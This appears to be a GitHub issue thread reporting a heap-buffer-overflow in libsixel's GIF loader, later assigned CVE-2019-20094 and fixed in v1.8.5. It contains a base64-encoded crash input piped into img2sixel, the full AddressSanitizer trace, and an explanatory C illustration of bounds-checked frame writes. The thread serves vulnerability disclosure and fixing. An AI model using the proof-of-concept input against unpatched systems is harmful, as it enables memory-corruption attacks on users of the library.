Closed cuanduo closed 4 years ago
I can't reproduce it.
$ Linux vagrant 4.15.0-72-generic #81-Ubuntu SMP Tue Nov 26 12:20:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ git checkout v1.8.4 && (CFLAGS="-g -O0 -fno-omit-frame-pointer -fsanitize=address" ./configure && make && sudo make install) 2>&1 > /dev/null && echo H4sIAM5HA14AA3P3dLOwTIzafqjiIjMDENzlZP/9mfX///+KP1l4uRiYGXRAogZAyMD0786OwsfHeqXN88hlBC5y6ZTCJjVFAyQlpJqFIeUFk/K6gialipCasgJFSghZSiMQSaoTTeoRXMoNXWoRXAokwtSi8Q8iB2QFLjoClVsMFGFlYoFogzKQpBiZWDjAUlAGVGoRFqlOQlKBWKWk8EtZYJcSgkuhOx5JCuJTOOMfihxqUEGkNHBImcKkWBFSIsRLMeKUYlJEkuJAkWJQRZYKQEg5NDAg6ZrCIaDgAJaywLALNaT+CbE6weUwgwomxdWCPxQhUjugiuHRAtGOiEygFRJAlzUwMDshSRVCXTYDJMXBDHWrNJLUlA6DxEMtnIooUouhkSEAlIKFSy+qVCDQQCFUqccocfkPzDpCRG7Bk8fw5Ux8+RlfKYCv7MBX4pDGkMYtx8pgDQAZg3/ARQUAAA== | base64 --decode | gunzip | converters/img2sixel && echo ok
HEAD is now at 686d234 Merge branch 'release'
ar: `u' modifier ignored since `D' is the default (see `U')
q"1;1;48;48#0;2;0;0;0#1;2;87;4;3#2;2;98;95;2-------ok
Can you give me more information about your environment?
ok, reproduced with -I option
$ git checkout v1.8.4 && (CFLAGS="-g -O0 -fno-omit-frame-pointer -fsanitize=address" ./configure && make && sudo make install) 2>&1 > /dev/null && echo H4sIAM5HA14AA3P3dLOwTIzafqjiIjMDENzlZP/9mfX///+KP1l4uRiYGXRAogZAyMD0786OwsfHeqXN88hlBC5y6ZTCJjVFAyQlpJqFIeUFk/K6gialipCasgJFSghZSiMQSaoTTeoRXMoNXWoRXAokwtSi8Q8iB2QFLjoClVsMFGFlYoFogzKQpBiZWDjAUlAGVGoRFqlOQlKBWKWk8EtZYJcSgkuhOx5JCuJTOOMfihxqUEGkNHBImcKkWBFSIsRLMeKUYlJEkuJAkWJQRZYKQEg5NDAg6ZrCIaDgAJaywLALNaT+CbE6weUwgwomxdWCPxQhUjugiuHRAtGOiEygFRJAlzUwMDshSRVCXTYDJMXBDHWrNJLUlA6DxEMtnIooUouhkSEAlIKFSy+qVCDQQCFUqccocfkPzDpCRG7Bk8fw5Ux8+RlfKYCv7MBX4pDGkMYtx8pgDQAZg3/ARQUAAA== | base64 --decode | gunzip | converters/img2sixel -I && echo ok
HEAD is now at 686d234 Merge branch 'release'
ar: `u' modifier ignored since `D' is the default (see `U')
=================================================================
==3386==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f2bf4629e9c at pc 0x7f2c542785f4 bp 0x7ffe807e8570 sp 0x7ffe807e8560
WRITE of size 1 at 0x7f2bf4629e9c thread T0
#0 0x7f2c542785f3 in gif_init_frame /home/vagrant/libsixel/src/fromgif.c:250
#1 0x7f2c5427ad7d in load_gif /home/vagrant/libsixel/src/fromgif.c:644
#2 0x7f2c54274a9c in load_with_builtin /home/vagrant/libsixel/src/loader.c:888
#3 0x7f2c54275426 in sixel_helper_load_image_file /home/vagrant/libsixel/src/loader.c:1392
#4 0x7f2c54284d5d in sixel_encoder_encode /home/vagrant/libsixel/src/encoder.c:1737
#5 0x55cce5eb4232 in main /home/vagrant/libsixel/converters/img2sixel.c:451
#6 0x7f2c53e12b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#7 0x55cce5eb1c59 in _start (/home/vagrant/libsixel/converters/.libs/img2sixel+0x1c59)
0x7f2bf4629e9c is located 0 bytes to the right of 58156700-byte region [0x7f2bf0eb3800,0x7f2bf4629e9c)
allocated by thread T0 here:
#0 0x7f2c545bbb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x55cce5eb4523 in rpl_malloc /home/vagrant/libsixel/converters/malloc_stub.c:45
#2 0x7f2c542924b0 in sixel_allocator_malloc /home/vagrant/libsixel/src/allocator.c:155
#3 0x7f2c5427825c in gif_init_frame /home/vagrant/libsixel/src/fromgif.c:239
#4 0x7f2c5427ad7d in load_gif /home/vagrant/libsixel/src/fromgif.c:644
#5 0x7f2c54274a9c in load_with_builtin /home/vagrant/libsixel/src/loader.c:888
#6 0x7f2c54275426 in sixel_helper_load_image_file /home/vagrant/libsixel/src/loader.c:1392
#7 0x7f2c54284d5d in sixel_encoder_encode /home/vagrant/libsixel/src/encoder.c:1737
#8 0x55cce5eb4232 in main /home/vagrant/libsixel/converters/img2sixel.c:451
#9 0x7f2c53e12b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/vagrant/libsixel/src/fromgif.c:250 in gif_init_frame
Shadow bytes around the buggy address:
0x0fe5fe8bd380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe5fe8bd390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe5fe8bd3a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe5fe8bd3b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fe5fe8bd3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe5fe8bd3d0: 00 00 00[04]fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd3e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd3f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0fe5fe8bd420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3386==ABORTING
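The report above shows a one-byte WRITE landing exactly at the end of the 58156700-byte frame buffer that gif_init_frame allocated a few lines earlier ("0 bytes to the right of" the region), i.e. a decoder trusting header-derived geometry and stepping one past its own allocation. The following is an added illustration and not libsixel's code: the frame_t type, frame_alloc, frame_put_pixel and frame_fill_run are hypothetical names chosen here to show the two checks a decoder wants before writing decoded pixels, an overflow-safe size computation at allocation time and an explicit bounds check at every store.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical 8-bit indexed frame, loosely modelled on what a GIF
 * decoder keeps per frame. Added illustration, not libsixel's code. */
typedef struct {
    size_t width;
    size_t height;
    uint8_t *pixels;   /* width * height bytes */
} frame_t;

/* Allocate a frame, refusing dimensions whose product would wrap size_t.
 * A wrapped size is the classic route to an undersized heap buffer. */
frame_t *frame_alloc(size_t width, size_t height)
{
    if (width == 0 || height == 0)
        return NULL;
    if (width > SIZE_MAX / height)          /* width * height would overflow */
        return NULL;
    frame_t *f = malloc(sizeof *f);
    if (f == NULL)
        return NULL;
    f->width = width;
    f->height = height;
    f->pixels = calloc(width * height, 1);  /* zero-filled, sized by checked product */
    if (f->pixels == NULL) {
        free(f);
        return NULL;
    }
    return f;
}

void frame_free(frame_t *f)
{
    if (f != NULL) {
        free(f->pixels);
        free(f);
    }
}

/* Bounds-checked pixel store. Returns 0 on success, -1 if (x, y) lies
 * outside the frame. Linear index width*height is exactly "0 bytes to
 * the right" of the region, the position the ASan report points at. */
int frame_put_pixel(frame_t *f, size_t x, size_t y, uint8_t value)
{
    if (f == NULL || x >= f->width || y >= f->height)
        return -1;
    f->pixels[y * f->width + x] = value;
    return 0;
}

/* Fill a run of `count` pixels starting at linear offset `start`, the kind
 * of write a sub-image descriptor would request. The range is validated
 * against the buffer actually allocated rather than against the header. */
int frame_fill_run(frame_t *f, size_t start, size_t count, uint8_t value)
{
    if (f == NULL)
        return -1;
    size_t total = f->width * f->height;    /* cannot overflow: checked in frame_alloc */
    if (start > total || count > total - start)
        return -1;
    memset(f->pixels + start, value, count);
    return 0;
}
```

Compiled with the same `-fsanitize=address` flags used in the reproduction above, the unchecked form of frame_put_pixel (dropping the `x >= f->width || y >= f->height` test) produces the same "heap-buffer-overflow ... 0 bytes to the right" report for the first out-of-range store, which is a quick way to confirm a fix exercises the boundary.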
This issue has been assigned CVE-2019-20094.
Fixed on v1.8.5. Thanks!
img2sixel -I $POC
smile.zip
asan output